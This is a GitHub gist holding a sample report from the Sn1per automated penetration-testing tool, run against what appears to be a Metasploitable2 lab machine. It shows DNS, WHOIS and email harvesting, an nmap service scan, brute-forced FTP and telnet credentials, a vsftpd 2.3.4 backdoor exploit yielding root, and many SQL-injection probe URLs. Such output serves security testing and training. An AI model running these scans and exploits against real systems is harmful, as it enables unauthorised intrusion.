Created
September 7, 2015 15:55
-
-
Save 1N3/070d14c364e5f23bfe5e to your computer and use it in GitHub Desktop.
Sn1per Sample Report
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
____ | |
_________ / _/___ ___ _____ | |
/ ___/ __ \ / // __ \/ _ \/ ___/ | |
(__ ) / / // // /_/ / __/ / | |
/____/_/ /_/___/ .___/\___/_/ | |
/_/ | |
+ -- --=[http://crowdshield.com | |
+ -- --=[sn1per v1.3 by 1N3 | |
################################### Running recon ################################# | |
;; connection timed out; no servers could be reached | |
Host 113.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN) | |
; <<>> DiG 9.9.5-9+deb8u2-Debian <<>> -x 192.168.1.113 | |
;; global options: +cmd | |
;; Got answer: | |
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 10662 | |
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 | |
;; OPT PSEUDOSECTION: | |
; EDNS: version: 0, flags:; udp: 4096 | |
;; QUESTION SECTION: | |
;113.1.168.192.in-addr.arpa. IN PTR | |
;; AUTHORITY SECTION: | |
168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800 | |
;; Query time: 19 msec | |
;; SERVER: 206.248.154.22#53(206.248.154.22) | |
;; WHEN: Sun Sep 06 17:06:03 EDT 2015 | |
;; MSG SIZE rcvd: 114 | |
# | |
# ARIN WHOIS data and services are subject to the Terms of Use | |
# available at: https://www.arin.net/whois_tou.html | |
# | |
# If you see inaccuracies in the results, please report at | |
# http://www.arin.net/public/whoisinaccuracy/index.xhtml | |
# | |
# | |
# The following results may also be obtained via: | |
# http://whois.arin.net/rest/nets;q=192.168.1.113?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2 | |
# | |
NetRange: 192.168.0.0 - 192.168.255.255 | |
CIDR: 192.168.0.0/16 | |
NetName: PRIVATE-ADDRESS-CBLK-RFC1918-IANA-RESERVED | |
NetHandle: NET-192-168-0-0-1 | |
Parent: NET192 (NET-192-0-0-0-0) | |
NetType: IANA Special Use | |
OriginAS: | |
Organization: Internet Assigned Numbers Authority (IANA) | |
RegDate: 1994-03-15 | |
Updated: 2013-08-30 | |
Comment: These addresses are in use by many millions of independently operated networks, which might be as small as a single computer connected to a home gateway, and are automatically configured in hundreds of millions of devices. They are only intended for use within a private context and traffic that needs to cross the Internet will need to use a different, unique address. | |
Comment: | |
Comment: These addresses can be used by anyone without any need to coordinate with IANA or an Internet registry. The traffic from these addresses does not come from ICANN or IANA. We are not the source of activity you may see on logs or in e-mail records. Please refer to http://www.iana.org/abuse/answers | |
Comment: | |
Comment: These addresses were assigned by the IETF, the organization that develops Internet protocols, in the Best Current Practice document, RFC 1918 which can be found at: | |
Comment: http://datatracker.ietf.org/doc/rfc1918 | |
Ref: http://whois.arin.net/rest/net/NET-192-168-0-0-1 | |
OrgName: Internet Assigned Numbers Authority | |
OrgId: IANA | |
Address: 12025 Waterfront Drive | |
Address: Suite 300 | |
City: Los Angeles | |
StateProv: CA | |
PostalCode: 90292 | |
Country: US | |
RegDate: | |
Updated: 2012-08-31 | |
Ref: http://whois.arin.net/rest/org/IANA | |
OrgTechHandle: IANA-IP-ARIN | |
OrgTechName: ICANN | |
OrgTechPhone: +1-310-301-5820 | |
OrgTechEmail: [email protected] | |
OrgTechRef: http://whois.arin.net/rest/poc/IANA-IP-ARIN | |
OrgAbuseHandle: IANA-IP-ARIN | |
OrgAbuseName: ICANN | |
OrgAbusePhone: +1-310-301-5820 | |
OrgAbuseEmail: [email protected] | |
OrgAbuseRef: http://whois.arin.net/rest/poc/IANA-IP-ARIN | |
# | |
# ARIN WHOIS data and services are subject to the Terms of Use | |
# available at: https://www.arin.net/whois_tou.html | |
# | |
# If you see inaccuracies in the results, please report at | |
# http://www.arin.net/public/whoisinaccuracy/index.xhtml | |
# | |
******************************************************************* | |
* * | |
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * | |
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * | |
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * | |
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * | |
* * | |
* TheHarvester Ver. 2.6 * | |
* Coded by Christian Martorella * | |
* Edge-Security Research * | |
* [email protected] * | |
******************************************************************* | |
[-] Searching in Google: | |
Searching 0 results... | |
Searching 100 results... | |
[+] Emails found: | |
------------------ | |
[email protected] | |
[email protected] | |
[email protected] | |
[email protected] | |
[email protected] | |
[email protected] | |
@192.168.1.113 | |
[email protected] | |
[email protected] | |
[email protected] | |
[email protected] | |
[+] Hosts found in search engines: | |
------------------------------------ | |
[-] Resolving hostnames IPs... | |
******************************************************************* | |
* * | |
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * | |
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * | |
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * | |
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * | |
* * | |
* TheHarvester Ver. 2.6 * | |
* Coded by Christian Martorella * | |
* Edge-Security Research * | |
* [email protected] * | |
******************************************************************* | |
[-] Searching in Bing: | |
Searching 50 results... | |
Searching 100 results... | |
[+] Emails found: | |
------------------ | |
@192.168.1.113 | |
[+] Hosts found in search engines: | |
------------------------------------ | |
[-] Resolving hostnames IPs... | |
******************************************************************* | |
* * | |
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * | |
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * | |
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * | |
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * | |
* * | |
* TheHarvester Ver. 2.6 * | |
* Coded by Christian Martorella * | |
* Edge-Security Research * | |
* [email protected] * | |
******************************************************************* | |
[-] Searching in Linkedin.. | |
Searching 100 results.. | |
Users from Linkedin: | |
==================== | |
******************************************************************* | |
* * | |
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * | |
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * | |
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * | |
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * | |
* * | |
* TheHarvester Ver. 2.6 * | |
* Coded by Christian Martorella * | |
* Edge-Security Research * | |
* [email protected] * | |
******************************************************************* | |
[-] Searching in 123People.. | |
Searching 0 results... | |
Searching 100 results... | |
Users from 123People: | |
===================== | |
[+] Emails found: | |
------------------ | |
No emails found | |
[+] Hosts found in search engines: | |
------------------------------------ | |
dnsenum.pl VERSION:1.2.3 | |
----- 192.168.1.113 ----- | |
Host's addresses: | |
__________________ | |
Name Servers: | |
______________ | |
192.168.1.113 NS record query failed: NXDOMAIN | |
Error: no name server (NS) entry for domain 192.168.1.113. exists | |
+ -- --=[Checking for SPF records on 192.168.1.113... | |
################################### Pinging host ################################### | |
PING 192.168.1.113 (192.168.1.113) 56(84) bytes of data. | |
64 bytes from 192.168.1.113: icmp_seq=1 ttl=64 time=0.414 ms | |
--- 192.168.1.113 ping statistics --- | |
1 packets transmitted, 1 received, 0% packet loss, time 0ms | |
rtt min/avg/max/mdev = 0.414/0.414/0.414/0.000 ms | |
################################### Running port scan ############################## | |
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:06 EDT | |
Nmap scan report for 192.168.1.113 | |
Host is up (0.00044s latency). | |
Not shown: 977 closed ports | |
PORT STATE SERVICE VERSION | |
21/tcp open ftp vsftpd 2.3.4 | |
|_ftp-anon: Anonymous FTP login allowed (FTP code 230) | |
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | |
| ssh-hostkey: | |
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) | |
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) | |
23/tcp open telnet Linux telnetd | |
25/tcp open smtp Postfix smtpd | |
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | |
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | |
| Not valid before: 2010-03-17T14:07:45 | |
|_Not valid after: 2010-04-16T14:07:45 | |
|_ssl-date: 2015-09-05T12:13:03+00:00; -1d08h53m38s from scanner time. | |
53/tcp open domain ISC BIND 9.4.2 | |
| dns-nsid: | |
|_ bind.version: 9.4.2 | |
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) | |
|_http-methods: No Allow or Public header in OPTIONS response (status code 200) | |
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 | |
|_http-title: Metasploitable2 - Linux | |
111/tcp open rpcbind 2 (RPC #100000) | |
| rpcinfo: | |
| program version port/proto service | |
| 100000 2 111/tcp rpcbind | |
| 100000 2 111/udp rpcbind | |
| 100003 2,3,4 2049/tcp nfs | |
| 100003 2,3,4 2049/udp nfs | |
| 100005 1,2,3 43932/tcp mountd | |
| 100005 1,2,3 58097/udp mountd | |
| 100021 1,3,4 39515/udp nlockmgr | |
| 100021 1,3,4 41962/tcp nlockmgr | |
| 100024 1 38115/udp status | |
|_ 100024 1 43758/tcp status | |
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) | |
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) | |
512/tcp open exec netkit-rsh rexecd | |
513/tcp open login? | |
514/tcp open tcpwrapped | |
1099/tcp open java-rmi Java RMI Registry | |
1524/tcp open shell Metasploitable root shell | |
2049/tcp open nfs 2-4 (RPC #100003) | |
| rpcinfo: | |
| program version port/proto service | |
| 100000 2 111/tcp rpcbind | |
| 100000 2 111/udp rpcbind | |
| 100003 2,3,4 2049/tcp nfs | |
| 100003 2,3,4 2049/udp nfs | |
| 100005 1,2,3 43932/tcp mountd | |
| 100005 1,2,3 58097/udp mountd | |
| 100021 1,3,4 39515/udp nlockmgr | |
| 100021 1,3,4 41962/tcp nlockmgr | |
| 100024 1 38115/udp status | |
|_ 100024 1 43758/tcp status | |
2121/tcp open ftp ProFTPD 1.3.1 | |
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | |
| mysql-info: | |
| Protocol: 53 | |
| Version: .0.51a-3ubuntu5 | |
| Thread ID: 100465 | |
| Capabilities flags: 43564 | |
| Some Capabilities: SupportsTransactions, LongColumnFlag, SupportsCompression, ConnectWithDatabase, Support41Auth, Speaks41ProtocolNew, SwitchToSSLAfterHandshake | |
| Status: Autocommit | |
|_ Salt: .iHhWW23JWY9Ph9"?Ti3 | |
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 | |
5900/tcp open vnc VNC (protocol 3.3) | |
| vnc-info: | |
| Protocol version: 3.3 | |
| Security types: | |
|_ Unknown security type (33554432) | |
6000/tcp open X11 (access denied) | |
6667/tcp open irc Unreal ircd | |
| irc-info: | |
| users: 1 | |
| servers: 1 | |
| lusers: 1 | |
| lservers: 0 | |
| server: irc.Metasploitable.LAN | |
| version: Unreal3.2.8.1. irc.Metasploitable.LAN | |
| uptime: 3 days, 21:01:56 | |
| source ident: nmap | |
| source host: C4A81015.78DED367.FFFA6D49.IP | |
|_ error: Closing Link: nwqhmpvop[192.168.1.111] (Quit: nwqhmpvop) | |
8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | |
|_ajp-methods: Failed to get a valid response for the OPTION request | |
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | |
|_http-favicon: Apache Tomcat | |
|_http-methods: No Allow or Public header in OPTIONS response (status code 200) | |
|_http-server-header: Apache-Coyote/1.1 | |
|_http-title: Apache Tomcat/5.5 | |
MAC Address: 00:0C:29:0E:B0:99 (VMware) | |
Device type: general purpose | |
Running: Linux 2.6.X | |
OS CPE: cpe:/o:linux:linux_kernel:2.6 | |
OS details: Linux 2.6.9 - 2.6.33 | |
Network Distance: 1 hop | |
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel | |
Host script results: | |
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | |
| smb-os-discovery: | |
| OS: Unix (Samba 3.0.20-Debian) | |
| NetBIOS computer name: | |
| Workgroup: WORKGROUP | |
|_ System time: 2015-09-05T08:13:01-04:00 | |
TRACEROUTE | |
HOP RTT ADDRESS | |
1 0.44 ms 192.168.1.113 | |
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 28.83 seconds | |
################################### Running Intrusive Scans ######################## | |
+ -- --=[Port 21 opened... running tests... | |
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:06 EDT | |
Nmap scan report for 192.168.1.113 | |
Host is up (0.00033s latency). | |
PORT STATE SERVICE VERSION | |
21/tcp open ftp vsftpd 2.3.4 | |
|_ftp-anon: Anonymous FTP login allowed (FTP code 230) | |
| ftp-brute: | |
| Accounts: | |
| user:user - Valid credentials | |
|_ Statistics: Performed 1951 guesses in 602 seconds, average tps: 3 | |
| ftp-vsftpd-backdoor: | |
| VULNERABLE: | |
| vsFTPd version 2.3.4 backdoor | |
| State: VULNERABLE (Exploitable) | |
| IDs: CVE:CVE-2011-2523 OSVDB:73573 | |
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04. | |
| Disclosure date: 2011-07-03 | |
| Exploit results: | |
| Shell command: id | |
| Results: uid=0(root) gid=0(root) | |
| References: | |
| http://osvdb.org/73573 | |
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 | |
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html | |
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | |
MAC Address: 00:0C:29:0E:B0:99 (VMware) | |
Service Info: OS: Unix | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 603.82 seconds | |
+ -- --=[Port 22 opened... running tests... | |
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:16 EDT | |
Nmap scan report for 192.168.1.113 | |
Host is up (0.00018s latency). | |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | |
| ssh-hostkey: | |
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) | |
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) | |
MAC Address: 00:0C:29:0E:B0:99 (VMware) | |
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds | |
+ -- --=[Port 23 opened... running tests... | |
Using config file torch.conf... | |
Loading include and plugin ... | |
############################################################### | |
# Cisco Torch Mass Scanner # | |
# Becase we need it... # | |
# http://www.arhont.com/cisco-torch.pl # | |
############################################################### | |
List of targets contains 1 host(s) | |
15268: Checking 192.168.1.113 ... | |
HUH db not found, it should be in fingerprint.db | |
Skipping Telnet fingerprint | |
*** Found TFTP server | |
HUH db not found, it should be in tfingerprint.db | |
Skipping tftp fingerprint | |
---> | |
- All scans done. Cisco Torch Mass Scanner - | |
---> Exiting. | |
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:17 EDT | |
Nmap scan report for 192.168.1.113 | |
Host is up (0.0021s latency). | |
PORT STATE SERVICE VERSION | |
23/tcp open telnet Linux telnetd | |
| telnet-brute: | |
| Accounts: | |
| user:user - Valid credentials | |
|_ Statistics: Performed 2069 guesses in 603 seconds, average tps: 3 | |
| telnet-encryption: | |
|_ Telnet server does not support encryption | |
MAC Address: 00:0C:29:0E:B0:99 (VMware) | |
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 604.67 seconds | |
+ -- --=[Port 25 opened... running tests... | |
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT | |
Nmap scan report for 192.168.1.113 | |
Host is up (0.00052s latency). | |
PORT STATE SERVICE VERSION | |
25/tcp open smtp Postfix smtpd | |
| smtp-brute: | |
|_ ERROR: Failed to retrieve authentication mechanisms form server | |
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | |
| smtp-enum-users: | |
|_ Method RCPT returned a unhandled status code. | |
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed | |
| smtp-vuln-cve2010-4344: | |
|_ The SMTP server is not Exim: NOT VULNERABLE | |
MAC Address: 00:0C:29:0E:B0:99 (VMware) | |
Service Info: Host: metasploitable.localdomain | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds | |
ERROR: Can't open username file BruteX/simple-users.txt: No such file or directory | |
+ -- --=[Port 53 opened... running tests... | |
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT | |
Nmap scan report for 192.168.1.113 | |
Host is up (0.0016s latency). | |
PORT STATE SERVICE VERSION | |
25/tcp open smtp Postfix smtpd | |
MAC Address: 00:0C:29:0E:B0:99 (VMware) | |
Service Info: Host: metasploitable.localdomain | |
Host script results: | |
|_dns-brute: Can't guess domain of "192.168.1.113"; use dns-brute.domain script argument. | |
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
Nmap done: 1 IP address (1 host up) scanned in 17.75 seconds | |
+ -- --=[Port 80 opened... running tests... | |
console.error: | |
[CustomizableUI] | |
Custom widget with id loop-button does not return a valid node | |
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-06 17:27 EDT | |
Nmap scan report for 192.168.1.113 | |
Host is up (0.00032s latency). | |
PORT STATE SERVICE VERSION | |
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) | |
| http-csrf: | |
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.113 | |
| Found the following possible CSRF vulnerabilities: | |
| | |
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html | |
| Form id: | |
| Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome | |
| | |
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html | |
| Form id: | |
| Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome | |
| | |
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html | |
| Form id: | |
| Form action: http://TWiki.org/cgi-bin/edit/TWiki/ | |
| | |
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html | |
| Form id: | |
| Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins | |
| | |
| Path: http://192.168.1.113/twiki/TWikiDocumentation.html | |
| Form id: | |
| Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs | |
| | |
| Path: http://192.168.1.113/mutillidae/./index.php?page=register.php | |
| Form id: id-bad-cred-tr | |
|_ Form action: index.php?page=register.php | |
|_http-dombased-xss: Couldn't find any DOM based XSS. | |
|_http-drupal-modules: | |
| http-email-harvest: | |
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.113 | |
| [email protected] | |
| [email protected] | |
| [email protected] | |
| [email protected] | |
| [email protected] | |
| [email protected] | |
|_ [email protected] | |
| http-enum: | |
| /tikiwiki/: Tikiwiki | |
| /test/: Test page | |
| /phpinfo.php: Possible information file | |
| /phpMyAdmin/: phpMyAdmin | |
| /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2' | |
| /icons/: Potentially interesting folder w/ directory listing | |
|_ /index/: Potentially interesting folder | |
|_http-feed: Couldn't find any feeds. | |
|_http-frontpage-login: false | |
| http-headers: | |
| Date: Sat, 05 Sep 2015 12:34:28 GMT | |
| Server: Apache/2.2.8 (Ubuntu) DAV/2 | |
| X-Powered-By: PHP/5.2.4-2ubuntu5.10 | |
| Connection: close | |
| Content-Type: text/html | |
| | |
|_ (Request type: HEAD) | |
|_http-iis-webdav-vuln: ERROR: This web server is not supported. | |
|_http-methods: No Allow or Public header in OPTIONS response (status code 200) | |
| http-php-version: Versions from logo query (less accurate): 5.1.3 - 5.1.6, 5.2.0 - 5.2.17 | |
| Versions from credits query (more accurate): 5.2.3 - 5.2.5 | |
|_Version from header x-powered-by: PHP/5.2.4-2ubuntu5.10 | |
|_http-referer-checker: Couldn't find any cross-domain scripts. | |
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 | |
| http-sql-injection: | |
| Possible sqli for queries: | |
| http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=N%3bO%3dD%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=register%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dhints%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=framing%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=set%2dbackground%2dcolor%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=home%2ephp&do=toggle%2dsecurity%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=html5%2dstorage%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=installation%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=php%2derrors%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=usage%2dinstructions%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=dns%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=site%2dfooter%2dxss%2ddiscussion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=pen%2dtest%2dtool%2dlookup%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=change%2dlog%2ehtm%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=capture%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=notes%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dpoll%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=documentation%2fhow%2dto%2daccess%2dMutillidae%2dover%2dVirtual%2dBox%2dnetwork%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=arbitrary%2dfile%2dinclusion%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=source%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=secret%2dadministrative%2dpages%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=show%2dlog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=text%2dfile%2dviewer%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/?page=add%2dto%2dyour%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/index.php?page=home%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=D%3bO%3dD%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=S%3bO%3dD%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=M%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=D%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=N%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=S%3bO%3dA%27%20OR%20sqlspider | |
| http://192.168.1.113/dav/?C=M%3bO%3dD%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=installation%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=view%2dsomeones%2dblog%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./?page=credits%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=documentation%2fvulnerabilities%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/./index.php?page=login%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=browser%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?username=anonymous&page=password%2dgenerator%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=user%2dinfo%2ephp%27%20OR%20sqlspider | |
| http://192.168.1.113/mutillidae/././index.php?page=captured%2ddata%2ephp%27%20OR%20sqlspider | |
